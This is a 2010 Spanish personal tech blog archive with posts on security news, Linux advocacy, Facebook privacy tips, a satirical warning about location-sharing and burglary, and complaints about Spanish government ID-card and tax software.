J2G2

Para Morirse

2010-07-15T09:24:00.002+02:00

Fijaros lo que le pasó a mi querido amigo Chema....

Chema Alonso en una visita a una persona a la UCI, se encontró con algo sorprendente. Un mensaje de IP Duplicada en uno de los equipos encargados de monitorizar las constantes vitales de los enfermos! ¿Alguien estuvo realizando alguna maldad? ¿El técnico configuró las direcciones IP de los equipos al azar? Nunca se sabe, lo que está claro es que yo no me sentiría muy cómodo si mis constantes son monitorizadas a distancia y en mi monitor pone que mi IP está duplicada.

Un nuevo add-on de Firefox te permite navegar seguro por la red

2010-06-21T09:10:00.000+02:00

Electronic Frontier Foundation (EFF) y el proyecto Tor han realizado una extensión para el navegador Firefox denominada HTTPS Everywhere con el objetivo de proteger todas las conexiones que se realicen al visitar páginas web. Esto se consigue creando una conexión HTTPS (Hypertext Transfer Protocol Secure) con los sitios web que se visitan con el navegador.

La aplicación, aún en base beta, parece funcionar perfectamente con páginas importantes como: Google, Wikipedia, The New York Times, The Washington Post, PayPal, EFF, Tor, Ixquick, Facebook y Twitter.

Según los creadores, aunque el método es bastante seguro no es inmune al espionaje, ya que usando HTTPS no se esconde la dirección IP. Es por ello que recomiendan complementar dicha extensión con herramientas como Vanish y Tor/VPN, que garantizan el anonimato.

Podéis encontrar HTTPS Everywhere en su página oficial.

Ciberterrorismo, el lado oscuro de la red

2010-06-18T21:12:00.001+02:00

Internet se ha convertido en un vehículo de transmisión de propaganda, datos cifrados y planes de grupos terroristas desde ETA a Al Quaeda. Los autores de atentados como los del 11 de septiembre en Nueva York o el que causó 200 muertos en Madrid, utilizaron la red. Con la llegada de la era digital, la seguridad se juega también en el ciberespacio. Y quienes luchan contra ese lado oscuro, lo saben muy bien. La Secretaria General del CNI, Elena Sánchez ha hablado por primera vez para televisión. Asegura que los ataques contra la seguridad nacional, a través de las redes, son una amenaza lejana, pero real. Hemos estado en el corazón de la lucha contra el ciberterrorismo y hemos comprobado que son muchos los medios y los especialistas que trabajan para que estemos seguros. (12/06/2010).

Ver vídeo

Dell "Ubuntu es sencillamente para quienes gustan que el PC funcione"

2010-06-17T08:36:00.000+02:00

Dell, gigante del sector PC, ha sorprendido con una lista de diez puntos con las razones para elegir Ubuntu en lugar de Windows. “Ubuntu es sencillamente para quienes gustan que el PC funcione".

En una lista de 10 puntos, Dell escribe que la alternativa Linux es sencilla y elegante, es rápida y adecuada para quienes prefieren una solución estable y

Los empleados de Google deciden abandonar Windows por seguridad

2010-06-15T12:52:00.001+02:00

Entre los sistemas sustitutos se encuentra Mac o Linux, aunque se habla de que la medida sería una forma de incluir el próximo sistema operativo Google Chrome, en los más de 10 mil trabajadores del buscador.

"Google elimina gradualmente el uso de Windows, el omnipresente sistema operativo de Microsoft", afirma el diario británico Financial Times en su página web, en un artículo que atribuye la decisión a "cuestiones de seguridad".

El progresivo abandono de Windows por parte de Google supondría que 10 mil trabajadores del buscador a nivel internacional dejarían de usar el sistema operativo de Microsoft.

Según un empleado de Google, se trata de medidas de seguridad."Tras los ataques de seguridad en China mucha gente ha dejado el PC y se está pasando a Mac".

Los empleados tienen la opción de usar ordenadores de Apple Mac o PC con sistema operativo Linux. "Linux es un código abierto y nos sentimos bien con él", dijo un empleado, "con Microsoft no nos sentimos tan bien".

El sistema operativo Windows es conocido por ser más vulnerable a los ataques de hackers y más susceptible a los virus informáticos que otros sistemas operativos.

Realmente entre las razones de seguridad también podría encontrarse un esfuerzo por parte del buscador por ir implantando los productos Google en la compañía, incluido el próximo sistema operativo Google Chrome. Google y Microsoft compiten en muchos frentes, desde la búsqueda, al correo electrónico y en un futuro en los sistemas operativos.

Mientras que Google es líder indiscutible en lo que se refiere a buscadores, Windows sigue siendo el sistema operativo más popular del mundo por un amplio margen, con diversas versiones que representan más del 80% de las instalaciones a nivel mundial.

Un supercomputador con Ubuntu

2010-06-15T08:34:00.000+02:00

Ya sabéis que Linux triunfa en supercomputadores: la última lista TOP500.org confirma su papel desde hace años en este campo, y de hecho montarte tu propio cluster -ya sea a pequeña o a gran escala- no es tan complicado como podría parecer.

Es lo que explica un experto en estos temas en un whitepaper titulado “John the Ripper en un Cluster Ubuntu 10.04 MPI“. En el documento en formato PDF, que tenéis disponible aquí, se explican los pasos que son necesarios para implantar desde cero un pequeño cluster que en el ejemplo está formado por dos máquinas con Ubuntu 10.04 y que están conectadas por una simple y sencilla red WiFi.

La puesta en marcha se realizó gracias a los paquetes MPICH, una implementación libre y gratuita de MPI, el estándar de paso de mensajes que permite combinar la potencia de varias máquinas para aplicaciones con memoria distribuida en computación paralela.

Nos lo cuentan en Tick Tack Boom, donde señalan que en el whitepaper se ha realizado esa tarea tomando como tarea distribuida el ataque a un fichero de contraseñas por la fuerza bruta con la famosa aplicación John the Ripper. En estos casos es precisamente donde tener más y más procesadores es muy útil, así que construirte un clúster no es una idea nada descabellada.

La puesta en marcha no parece especialmente complicada, y en 10 páginas se van exponiendo los distintos pasos necesarios para llegar al resultado final, que no es más que la combinación de las máquinas disponibles para crear un cluster de computación paralela que puede aplicarse obviamente a muchas más tareas. Súper curioso, ¿a que sí?

Vigila tu nivel de privacidad en Facebook

2010-06-10T08:40:00.001+02:00

Cada vez son más las herramientas que tratan de concienciar al usuario sobre la privacidad en las redes sociales. Una de ellas es Privacy Defender, una aplicación para Facebook que informa de la información que se comparte con el resto de usuarios.

Tras el nuevo modelo presentado por Facebook para la gestión de las opciones de privacidad, muchos usuarios siguen sin moverse con facilidad por los paneles de configuración creados para tal efecto y como consecuencia, algunos no son conscientes del estado actual de sus preferencias de seguridad; es por esta razón por lo que en los últimos meses han ido apareciendo diversas herramientas que informan sobre el estado actual de los datos de cara a otros usuarios y a otras fuentes externas sin necesidad de indagar por los diversos menús de configuración. A diferencia de este tipo de útiles como Reclaim Privacy y Profile Watch, que ofrecen una valoración sobre el nivel de privacidad, Privacy Defender genera un gráfico en forma de anillo con una interfaz bastante amigable e intuitiva que representa dichas opciones por medio de sectores y colores. El anillo está formado por una serie de pistas que representan los grupos de personas con los que se comparte información que a su vez se dividen en porciones indicando el tipo de información asociada con el usuario (fotos y vídeo, comentarios, nombre, etc).

Otra característica destacable es la facilidad para cambiar las opciones de configuración a través de una barra situada en la parte inferior del gráfico formada por tres niveles. El primero de ellos, llamado «My friends» adapta las preferencias de usuario para ser compartida únicamente con amigos. El segundo, «My social network», permite compartir únicamente cierta información con amigos de tus amigos y cuyo objetivo es incrementar el número de contactos sin llegar a hacer público tu perfil. Por último, la opción «Everyone but not everything» se trata de la menos restrictiva de todas y configura el perfil como público excepto ciertos datos personales tales como el teléfono o el correo.

Para usar Privacy Defender hay que instalar la aplicación en Facebook una vez registrado y después añadir un marcador en el navegador arrastrando el botón gris a la barra de herramientas del mismo (en el caso de Internet Explorer mediante botón derecho del ratón y seleccionando la opción de añadir a Favoritos). Posteriormente pulsando el marcador previamente creado, el programa empezará a escanear las opciones de privacidad configuradas por el usuario y, al cabo de unos segundos, mostrará el gráfico con las mismas. Tras elegir el nivel de privacidad deseado, hay que pulsar en «Fix my Privacity» y al cabo de unos segundos estará configurado el perfil con las nuevas preferencias.

WikiUnix: aprende los comandos de Linux por niveles

2010-06-07T09:27:00.000+02:00

WikiUnix es una plataforma educativa, en línea y libre con filosofía wiki para que aprendamos y asimilemos conceptos y comandos de los sistemas operativos Un*x (GNU/Linux incluido). Además, nos proporciona un entorno para hacer los ejercicios y autocorregirlos basado en una máquina virtual de Xubuntu.

En WikiUnix los artículos están divididos en los siguientes niveles:

Por si todo esto no fuera poco, tenemos disponibles también los documentos en PDF correspondientes a cada uno de los niveles.

Sin duda un sitio en los que pasar horas y horas aprendiendo y, por qué no, colaborando.

¿Necesitas razones para probar Linux? Aquí tienes 25

2010-06-03T09:40:00.000+02:00

El Grupo de Usuarios Asociación de Internautas LINUX GUAI, destacan en su sito web, la lectura y difusión del artículo, cortesía de Planeta Anuxilandia, que por su interés, a continuación reproducimos:

1- Está disponible sin ningún coste. Puede ser descargado de Internet de forma gratuita, y puede ser adquirido en formato CD o DVD con un coste muy trivial. Una copia puede ser utilizada en tantos ordenadores como queramos sin restricciones. Si comparamos con Microsoft Windows, solo el sistema operativo nos costará por lo menos 100 € por ordenador

2 - Debido a que es software libre, Linux también es gratuito en el sentido de que cualquiera está autorizado a modificar, incluso su código fuente, de cualquier forma deseada. Si las versiones modificadas no son re-distribuidas, los cambios pueden mantenerse en secreto. Esto también choca bastante con Microsoft Windows, ya que las modificaciones no están permitidas. El código fuente es la versión original de un programa tal y como lo haya escrito un programador usando un lenguaje de programación y antes de ser compilado de forma que sus instrucciones puedan ser entendidas directamente por un ordenador. Por lo tanto, es necesario tener el código fuente con el fin de poder realizar cambios en un determinado programa. Esta capacidad de experimentar con el código fuente, y hacerlo sin necesidad de dar a conocer las modificaciones a terceros ha sido muy importante para un gran numero de organizaciones.

3 - Linux cuenta con un soporte de alta calidad disponible de forma gratuita a través de Internet, en grupos de noticias y foros. Algunas personas afirman que este soporte es al menos tan bueno como en el software privativo, que además funciona, evidentemente, pagando. Linux puede adquirirse si se desea de forma comercial. Existen empresas que basan su negocio del software libre en negocio de servicios. Dan soporte de instalación de aplicaciones, parches para hacer frente a nuevas amenazas de seguridad y parches para arreglar bugs descubiertos recientemente. En Linux estos 2 últimos son relativamente infrecuentes...

4 - Hay muy pocas posibilidades de que el soporte técnico para algún sistema Linux se elimine porque el software haya quedado obsoleto o por cualquier otro motivo. Esto se debe a que el código fuente estará siempre disponible para cualquier persona que lo desee, incluidas aquellas personas que prestan dicho soporte de forma gratuita en Internet y también para aquellas empresas que basan su negocio en los servicios. Por el contrario Microsoft Windows, y otros programas privativos cuyo código fuente es mantenido en secreto, la obtención de soporte técnico se complica si la compañía que lo vende decide retirar el software con el fin de tratar de obligar al usuario a pagar por la nueva versión, por ejemplo.

5 - No existe ningún temor a que las aplicaciones se queden obsoletas con Linux. Esto se debe a que la arquitectura UNIX en la que se basan ha sido exhaustivamente probada y refinada durante más de 35 años y ha demostrado ser extremadamente eficaz, robusta y segura. Las mejoras se realizan a un ritmo rápido, pero las nuevas versiones siguen siendo compatibles con la arquitectura UNIX subyacente.

6 - No hay actualizaciones obligatorias para los usuarios de Linux. Esto se debe a que las versiones antiguas siguen siendo soportadas (por ejemplo, con el desarrollo de nuevos parches de seguridad y controladores de dispositivo) y porque las nuevas versiones, si así lo desean, están disponibles de forma gratuita y suelen ser compatibles con versiones anteriores. Los desarrolladores de software propietario, sin embargo, tienen fuertes incentivos financieros para planificar el que una determinada versión quede obsoleta. Su objetivo será inducir a los usuarios de versiones anteriores a gastar dinero para comprar o actualizar a las nuevas versiones.

7 - En caso de que un usuario decida actualizar a una versión más reciente de Linux, no hay derechos de licencia de software u otros gastos si el usuario selecciona una distribución libre. Por otra parte, la formación, modificaciones, adquisición de hardware y otros costos relacionados con una actualización a una nueva versión son también relativamente bajos debido a la compatibilidad con versiones anteriores.

8 - Linux no tiene complicados requisitos para hacer cumplir las licencias. En una empresa con cientos o miles de ordenadores, será necesario tener a un gran numero de personal solo para asegurarnos de que todos los ordenadores están cumpliendo con las complejas condiciones de autorización de uso (EULAs) para Microsoft Windows, Microsoft Office y otras aplicaciones propietarias. Con Linux no hay temor a auditorías sorpresa con posibles sanciones por violación de licencias.

9 - Linux es mucho más seguro con una muy baja tasa de infección por virus, troyanos, gusanos, software espía y otros códigos maliciosos. Esto se debe a que UNIX y todos sus descendientes (incluyendo Linux) fueron diseñados desde un principio con la seguridad en mente, en lugar de tratar de parchear graves fallos de seguridad cuando ys es demasiado tarde. Por ejemplo, los usuarios no habitúan a usar el sistema con permisos de administración, a fin de proteger los principales archivos del sistema. Incluso en el caso que la existencia de un código malicioso, este no poseería permisos suficientes para hacer mucho daño. Además un sólido firewall se incluye en las principales distribuciones y es activado por defecto. Otro factor a tener en cuenta es la libre disponibilidad del código fuente, lo que permite a miles de personas de todo el mundo poder buscar vulnerabilidades de seguridad.

10 - Linux es altamente resistente a los fallos de sistema y raramente necesita reiniciar. Esto puede ser muy importante para las grandes organizaciones para las que unos minutos de tiempo de inactividad puede suponer un coste sustancial. La razón es que Linux ha sido diseñado desde cero para ser un sistema operativo estable y robusto, incorporando todo lo aprendido en 35 años de historia de UNIX.

11 - Aunque el número y la variedad de programas para Linux aún no es tan grande como para el sistema operativo de Microsoft, ya existe una extensa selección y aumenta continuamente y cada vez más rápido a medida que más y más desarrolladores empiezan a crear programas para Linux. La mayoría de programas para Linux también son software libre y muchos de ellos tienen las mismas características y rinden igual o mejor que las ya existentes para Microsoft Windows. De hecho, los usuarios se encuentran a menudo con que todas las aplicaciones que necesitan están disponibles gratuitamente en Internet y que ya no necesitan comprar ningún software comercial.

12 - Existe una numerosa variedad de distribuciones Linux (varios cientos), cada una con su propio conjunto único de características, pero básicamente todas compatibles entre sí. Esto permite a los usuarios seleccionar las versiones que mejor respondan a sus necesidades específicas. También significa que si un distribuidor de Linux dejará de operar, todavía habría muchos otros para elegir. Por otra parte, fomenta una sana competencia entre ellas, contribuyendo así a la mejora continuada de la calidad y el rendimiento de Linux. La elección parece abrumadora pero por lo general es difícil cometer un error seleccionando una de las más populares, como Red Hat, Susu o Ubuntu.

13 - Linux cuenta con un alto grado de flexibilidad de configuración. Se puede lograr una alta personalización muy fácilmente y sin tener que modificar el código fuente. Es muy sencillo configurar Linux durante la instalación y optimizarlo para su uso como estación de trabajo, ordenador de escritorio, ordenador portátil, servidor web, servidor de base de datos, etc. Del mismo modo el aspecto y el comportamiento del escritorio, incluyendo iconos y menús puede ser configurado con un numero casi infinito de posibilidades y formas. Incluso puede hacerse parecido a Windows… Si esto no fuera suficiente, la capacidad de libre acceso al código fuente permite un grado de personalización ilimitado.

14 - Linux utiliza formatos abiertos y estándares. Estos son aquellos que se ajustan a las normas de la industria y que pueden ser utilizados por cualquier desarrollador de software para crear programas compatibles. Es el caso de los formatos para el procesamiento de textos, hojas de calculo y otros tipos de archivos. En comparación con los formatos privativos (véase el formato DOC), el uso de estándares elimina el problema del apego a las normas privadas, con la consecuente dificultad y coste a la hora de cambiar a otro software en un futuro. El uso de formatos abiertos permite al usuario tener el control total de sus datos, en particular en el caso de que el vendedor de software decida dar por obsoleta la versión del programa, obligando al usuario a migrar todos sus datos a la nueva versión, previo pago, por supuesto...

15 - Linux es generalmente más rápido para un determinado conjunto de especificaciones de hardware. Esto es debido a una mayor optimización del código fuente.

16 - Linux cuenta con un alto grado de compatibilidad con otros sistemas operativos. Por ejemplo, se puede escribir, leer, copiar, borrar y manipular los datos existentes en una partición para Microsoft Windows, actuar como servidor para una red que contenga clientes en Windows, formatear discos duros para el uso con Windows, e incluso ejecutar los programas de Windows directamente si fuera necesario. En comparación, los sistemas operativos de Microsoft no pueden acceder a particiones de disco que contengan otros sistemas, no pueden formatear discos duros para otros sistemas, etc, etc...

17 - La ética y la moral se mantienen muy altas en el mundo Linux y en el resto del software libre debido a la gran apertura de su proceso de desarrollo y a la libre disponibilidad del código fuente. Linux nunca ha sido condenado en un tribunal por violación de leyes antimonopolio u otros delitos, ni ha tenido que pagar sanciones por la copia no autorizada de tecnología desarrollada por otras empresas. Las políticas gubernamentales antimonopolio regulan o rompen monopolios con el fin de promover la libre competencia. Los beneficios por alcanzar dicha competencia afectan a la economía y a la sociedad en su conjunto.

18 - Linux reduce la necesidad de actualizar o sustituir hardware cuando se actualiza a una nueva versión. Esto se debe a que su código fuente es muy eficiente y compacto, lo que permite que funcione en computadoras antiguas que no son adecuadas para las versiones más recientes de Microsoft Windows.

19 - Linux es capaz de operar en una amplia variedad de plataformas y no solo se limita a equipos con procesadores Intel o AMD. Funciona perfectamente en una vasta variedad de equipos que van desde los superordenadores a los robots industriales, equipos médicos, teléfonos móviles (puede ejecutarse incluso en un reloj de pulsera)

20 - Linux es una mejor elección para su uso en las instituciones académicas por una serie de razones. Entre ellas se encuentra el hecho de que no hay secretos (en marcado contraste con el software privativo), con lo que los estudiantes tendrán la oportunidad de estudiar como funcionan realmente los ordenadores en lugar de simplemente aprender a usarlos. Muchos profesores están convencidos de que es mucho más importante aprender los fundamentos prácticos de la informática que aprender el uso de aplicaciones especificas (como Microsoft Word o Power Point). Una de las razones es que los fundamentos prácticos de la informática seguirán siendo validos después de muchos años, mientras que las aplicaciones (especialmente las propietarias) están en constante cambio y los conocimientos adquiridos quedarán obsoletos en pocos tiempo.

21 - Para los organismos gubernamentales, Linux permite la transparencia de los datos, ya que los almacena en formatos compatibles con toda la industria. Todo lo contrario al software comercial. Esta transparencia es importante para mantener una democracia efectiva. Esto permite a cualquier usuario acceder a los datos sin tener que comprar caros programas privativos. Por otra parte, mantenerlos en formatos estándar es mucho más seguro que hacerlo usando formatos propietarios.

22 - En Linux hay muy pocas razones para temer la existencia de puertas traseras, en parte porque todo el código fuente está disponible para su inspección. Una puerta trasera es un método secreto para obtener acceso remoto a un ordenador. Existe una (muy justificada) preocupación por parte de los gobiernos y las corporaciones de que dichas puertas traseras se han insertado de forma encubierta en el software propietario, permitiendo a los desarrolladores y a otros gobiernos a acceder a sus datos confidenciales.

23 - El uso y la promoción de Linux ayuda a fomentar una sana diversidad y aumento de competencia en toda la industria del software. Esa competencia puede promover el avance tecnológico, mejorar el rendimiento y disminuir los costes del software libre y del software propietario por igual. Tanto la teoría económica como los cientos de años de real experiencia en el mundo demuestran claramente que los monopolios no necesitan innovar, tienden a producir productos de mala calidad, inflan los precios y tienden a corromper el sistema político.

24 - Linux y el software libre no solo han alcanzado, o en algunos casos superado al software privativo, sino que también desarrollan más rápido. Esta tendencia irá a más, dado que la demanda para este tipo de software sigue creciendo y cada vez más personas y organizaciones participan activamente en su desarrollo.

25 - Linux ofrece la oportunidad de que los usuarios puedan contribuir al avance de la tecnología del software, debido a que el código fuente está disponible gratuitamente para ser estudiado, mejorado, ampliado y redistribuido. Un notable ejemplo de ello a nivel empresa ha sido IBM.

26 - Existen en realidad más de 25 razones por las que organizaciones de todo el mundo están migrando a Linux. Un vigésimo sexto motivo es que con Linux no hay necesidad de desfragmentar los discos duros a diferencia de Windows. La fragmentación, que es la difusión de datos en lugares no contiguos puede reducir la eficacia del almacenamiento de datos y ralentizar el funcionamiento de la máquina. Desfragmentar no es difícil, pero puede ser una molestia tener que hacerlo periódicamente, y no es necesario si tienes un sistema operativo bien diseñado.

Nace "n1adsl.com", web para analizar y comparar ADSL

2010-06-03T09:36:00.000+02:00

Ya está en el mercado el novedoso comparador que por fin te permitirá salir de la confusión que te encuentras al elegir tu operador de ADSL. Gracias a la prodigiosa calculadora superahorro del profesor N1, podrás encontrar la tarifa que ofrece en estos momentos el mayor ahorro para tu bolsillo.

Tan sólo deberás teclear en tu navegador www.N1ADSL.com y accederás al laboratorio del científico más entrañable de la red, donde calcularás el ahorro anual en 3 sencillos pasos:

Test de velocidad de tu ADSL actual.

Ofertas disponible para tu línea o dirección.

Ahorro en ADSL frente a tu operador actual.

A través de una navegación fácil e intuitiva y, en apenas unos segundos, tendrás frente a tus ojos la oferta más barata del mercado y el ahorro mensual y anual que te supondrá si abandonas tu actual operador y te decantas por el que te propone nuestro profesor bigotudo.

Pero si actualmente no dispones de ningún operador, la web te ofrece una tabla comparativa con las mejores ofertas de las compañías que en estos momentos están operando en tu zona de cobertura.

Además, si contratas el paquete en el momento que realices la consulta, obtendrás regalos exclusivos, como cuatro fines de semana para dos personas, en uno de los 300 destinos que ponemos a tu disposición.

La web también cuenta con un test de velocidad para que, siempre que quieras, puedas conocer los megas de bajada o de subida que tienes contratados con tu actual operador.

Herramienta de Análisis de la Configuración del Sistema

2010-06-02T16:08:00.001+02:00

Esta herramienta lleva a cabo un análisis exhaustivo de los elementos de riesgo de tu PC, agrupando y cotejando toda esa información para su análisis posterior. Es una utilidad especialmente indicada para situaciones en las que un antivirus no nos solucione el problema y necesitemos ir mas allá.

Más información aquí.

7 Cosas que se deben dejar de hacer en facebook de inmediato

2010-06-02T15:29:00.001+02:00

Usar una contraseña (password) débil o fácil de adivinar
Evite nombres o palabras simples que pueda encontrar en el diccionario, aun si le pone números al final. En vez de eso, mezcle letras con mayúsculas y minúsculas, números y símbolos. Una contraseña debe tener al menos 8 caracteres. Una técnica buena es insertar números o símbolos a la mitad de una palabra, como esta variante de la palabra “casas”: ¡cA27sAs!

Listar su fecha de nacimiento completa en su perfil
Es un objetivo ideal para los ladrones de identidad, que podrían usarlo para obtener más información sobre usted y potencialmente acceder a sus cuentas de banco o de crédito. Si ya ingresó su fecha de nacimiento, vaya a la página de su perfil de usuario y haga click en Info tab (la pestaña de información) y luego a Edit (Editar información). Bajo la sección de Información Básica, escoja mostrar solamente el mes y el día y no el año de su cumpleaños, o mejor, no ponga nada.

No aprovechar controles de privacidad útiles
Para casi todo en su perfil de usuario en Facebook, usted puede limitar el acceso a sus amigos, amigos de sus amigos o a usted solamente. Puede restringir acceso a sus fotos, fecha de nacimiento, creencias religiosas, e información de su familia, entre otras cosas. Usted puede otorgar sólo a ciertas personas o grupos acceso a fotos por ejemplo, o bloquear este acceso a algunas personas en particular. Considere no dejar información de contacto, como su teléfono o su dirección, ya que probablemente no quiera que nadie tenga acceso a esa información de cualquier forma.

Incluir el nombre de sus hijos en la descripción de una foto
No use el nombre de un niño en la etiqueta o título de las fotografías. Si alguien más lo hace, borre el nombre haciendo click en Remover la etiqueta (Remove Tag). Si su hijo no está en Facebook y alguien más incluye su nombre en una foto, pídale a esa persona que quite el nombre de su hijo.

Mencionar que va a salir de viaje
Eso es lo mismo que poner un anuncio que dice “no hay nadie en casa” en la puerta. Espere a estar de regreso en casa para decirles a todos lo increíble que fue su vacación, y no sea muy claro al respecto de las fechas de cualquier viaje que haga.

Dejar que lo encuentren las máquinas de búsqueda
Para evitar que cualquier desconocido pueda acceder a su página, vaya a la sección de Búsqueda (Search) de los controles de privacidad de Facebook y seleccione Sólo amigos (Only Friends) para los resultados de búsqueda de Facebook. Asegúrese que el recuadro para los resultados de búsqueda pública (Public search results) no ha sido marcado.

Permitir a los menores usar Facebook sin supervisión
Aunque Facebook limita su membresía a personas de 13 años o mayores, hay niños menores que lo usan. Si usted tiene un hijo pequeño o adolescente en Facebook, la mejor forma de supervisarlo es convirtiéndose en uno de sus amigos en línea. Use su correo de e-mail como el contacto de la cuenta de su hijo para que sea usted quien reciba notificaciones y pueda monitorear sus actividades. “Lo que ellos tal vez piensen que no tiene importancia, puede ser algo muy serio”, opina Charles Pavelites, un agente especial de supervisión en el Centro de quejas de delitos en Internet (Internet Crime Complaint Center). Por ejemplo, una niña que pone un comentario “Mi mamá no tarda en llegar a casa, tengo que lavar los platos” todos los días a la misma hora, está revelando demasiada información sobre las actividades regulares de ir y venir de los padres.

Este artículo puede completarse con 10 situaciones a evitar en Facebook.

Leer más...

Mashups para ladrones que usan twitel

2010-06-01T08:42:00.001+02:00

Algo real de lo cual la gente no se dá cuenta con el tema de las Redes Sociales... Este artículo es de mi amigo Chema... no tiene desperdicio.

Desde que me enredo con esto del tuittel estoy descubriendo muchas cosas nuevas divertidas con este servicio y, ésta en concreto, me ha hecho mucha gracia.

Se trata del servicio de alertas creado para los ladrones que desean saber que casas están vacías. Para ello, utilizando la web "Please, Rob me" puedes estar a la última de todas aquellas casas que se han quedado vacías porque sus propietarios se han ido y han tuiteado que están en otro lugar usando la web de http://foursquare.com/.

Así, basta con esperar las nuevas actualizaciones de las búsquedas para que lleguen las nuevas oportunidades. Estas oportunidades hay que atraparlas al vuelo, no vaya a ser que otro llegue y se adelante.

Pero no te preocupes, esto aun se puede mejorar, ¿qué os parece si hacemos un mashup que cuando aparezca la nueva oportunidad, busque en el perfíl del usuario la localización del mismo, nos pinte la casa en Google Maps, intente descubri la posición en la que se encuentra situado este twitteador, por ejemplo, si tiene el servicio de Google Latitude instalado en su ay!fon y extraiga datos de business intelligence?

No se, por ejemplo:

- Que busque la distancia a la que se encuentra de su casa.
- Que geoposicione las comisarias más cercanas.
- Que calcule lo que tardaría el usuario en volver a su casa utilizando el servicio de cálculo de rutas de Google Maps y nos diga el margen de tiempo.
- Que se conecte a su perfil en Linkedin mire su situación profesional para estimar su nivel económico.
- Que se conecte a su perfil en facebook y sepamos si está soltero, casado o vive con sus padres.

Una vez analizados todos esos datos, con los servicios de Business Intelligence se pueden establecer unos KPI que ayuden a saber que probabilidades hay de éxito o no.

Me encanta el twitel... y yo en Oslo... EPIC FAIL!!

El triste estado de los drivers del DNI-electrónico El triste estado de

2010-05-26T22:30:00.001+02:00

Si vamos a la página del DNIe podemos ver que hay cosas bastante mejorables.

Para empezar, no hay versión cifrada bajo HTTPS. Si intentamos acceder obtendremos un timeout. De este modo, no podemos tener garantías de que el contenido al que queremos acceder es realmente al que estamos accediendo. Esto es especialmente grave siendo la página de donde debes descargar los drivers.

En el caso de que alguien con aviesas intenciones hiciera un ataque man-in-the-middle podría manipular el archivo que nos vamos a descargar de forma que bajasemos una versión troyanizada del mismo que firmase cosas que nosotros no queramos firmar. Un ataque man-in-the-middle puede parecer atípico, pero no es imposible. Además, puesto que las firmas realizadas con DNI electrónico tienen validez legal, toda precaución me parece poca...

"Afortunadamente" en la web hay archivos .sign que permiten realizar la comprobación de que los ficheros son los correctos. Y pongo afortunadamente entre comillas, porque no es un proceso al alcance del usuario de a pie. En el caso de Linux, podríamos admitir este sistema (aunque el certificado raiz no esta incluido por defecto, así que habría que buscarse la vida para verificar la cadena de certificación) puesto que los usuarios suelen ser avanzados. Pero en el caso de Windows (el sistema usado por casi todo el mundo) esto no es realista. La solución ideal sería usar el propio sistema firmado de código que trae Windows pero, al menos hasta hace unas semanas, este no es el caso y lo que podemos ver es un mensaje en que se nos pregunta si queremos ejecutar el software de un publicador desconocido.

Por otro lado, la versión para Unix del driver sólo está disponible compilada. Los desarrolladores de OpenSC, para desincentivar la creación de módulos cerrados, obligan a que los módulos sean compilados para cada versión de OpenSC. Esto provoca que, o bien haya que usar versiones antiguas de OpenSC, o bien haya que recurrir a inventos.

Aparte de eso también podemos ver que las versiones para las distribuciones que tienen soporte no son precisamente modernas: para Ubuntu la última versión es para Karmic cuando Lucid salió hace casi un mes. Esperemos que no siga el camino del de Fedora, cuya última versión es para Fedora 10, mientras que Fedora 11 salió en Junio de 2009 y Fedora 13 sale en un par de días. Eso por hablar de las distribuciones que están soportadas.

En MacOS X, por lo que veo, también hay problemas ya que pide una versión obsoleta de OpenSC.

Lo primero que hice fue mandar un mail a las direcciones de correo de la web. Hace bastante de eso, y por ahora no he recibido respuesta, así que sirva este texto para ejercitar mi derecho al pataleo.

Por cierto, el certificado raíz del DNIe sigue sin estar incluido en Mozilla, al igual que el de la FNMT.

Para acabar, una curiosidad, en al menos uno de los drivers se han dejado los archivos internos de subversion.

20 claves para vivir sin ansiedad

2010-05-19T17:16:00.002+02:00

Como no solo de informática vive el hombre, hoy voy a publicar un tema sobre la salud. Resulta que el otro día al hacer la revisión médica ví el siguiente cartel y además mi cuerpo no esta afrontando de la manera más correcta, todos los temas que lleva mi lóca cabeza.

En esta ocasión a sido un poster creado por FAES FARMA, desde aquí mis felicitaciones para ellos por que se trata de un poster muy ameno con unos consejos muy buenos. Todos tenemos un amigo, un primo, alguien que se ha visto afectado por los nervios, yo os recomendaría que le dijerais que se mire este poster y que lo lleve a la práctica.

Resumiendo, ser felices y no os agovieis.

Un problema de Padre y muy Señor Mío

2010-04-28T17:10:00.001+02:00

Esta historia que os voy a dejar aquí es la indignación de un compañero y amigo, al que de momento voy a dejar en el "economato" que me ha mandado sobre como intentar entregar la renta con el Programa PADRE, a través de Internet con un sitema Windows 7. La lectura no tiene desperdicio.

Saludos Malignos!

Entregar la Renta 2009 con PADRE en Windows 7 e IE8

Llevo más de 1 hora intentando hacer mi declaración de la renta con el programa PADRE de este año. A primera vista, parecía que todo iba a ir como la seda, pero nada más lejos de la realidad.

Os pongo en antecedentes, soy un usuario normal en esto de hacer la declaración, utilizo Windows 7 e Internet Explorer 8, nada raro, digo yo. Ya el año pasado me tocó hacer la declaración desde un Windows XP porque el programa PADRE resulta que no le iba mucho eso del UAC, del MIC o de UIPI como medidas de seguridad, es más, si lo ejecutamos como Administradores, mejor que mejor.

Pensaba que este año, casi tres años y medio después de que saliera Windows Vista, las cosas iban a ir mejor, creo que es tiempo suficiente para que la gente responsable del desarrollo de la AEAT se ponga las pilas y adapte su aplicación a las necesidades de seguridad actual.

Sin embargo, me bajo el programa PADRE y lo primero que observo es que se sigue instalando en C:\AEAT. ¿No habíamos quedado que la raíz del volumen del sistema no se toca? ¿No se puede instalar en %PROGRAMFILES% como hacen el resto de las aplicaciones?

Si el programa tiene que trabajar en C:\AEAT, deberemos de tener como mínimo privilegios de administradores locales del equipo. ¿Por qué no puede simplemente crear una carpeta de datos en el perfil del usuario? Esto, entre otras cosas, aislaría los datos de un usuario y de otro en un equipo compartido. Pero claro, eso parece que es muy complicado para los desarrolladores de la AEAT. Señores que llevamos ya más de 10 años (incluyendo Windows XP) con gestión de perfiles de usuarios. La carpeta “Documents and settings” (en Windows XP) o “Users” (en Windows Vista y 7) no está ahí de adorno.

Claro, otra opción es cambiar las ACLs de la carpeta C:\AEAT y otorgar permisos completos al usuario en cuestión. Nada, esas cosas que hacen todos los españoles a diario cuando llegan de trabajar para entregar la declaración de la renta una vez al año.

Bueno, ya me temía yo que esto no iba a ser fácil. Aun así, yo continúo con mi declaración y ahora me toca descargarme los datos fiscales desde la Web de la AEAT. Aparentemente todo va bien, me conecta a la Web, me permite seleccionar el certificado, pero cuando quiero descargarme los datos sale este mensaje de error.

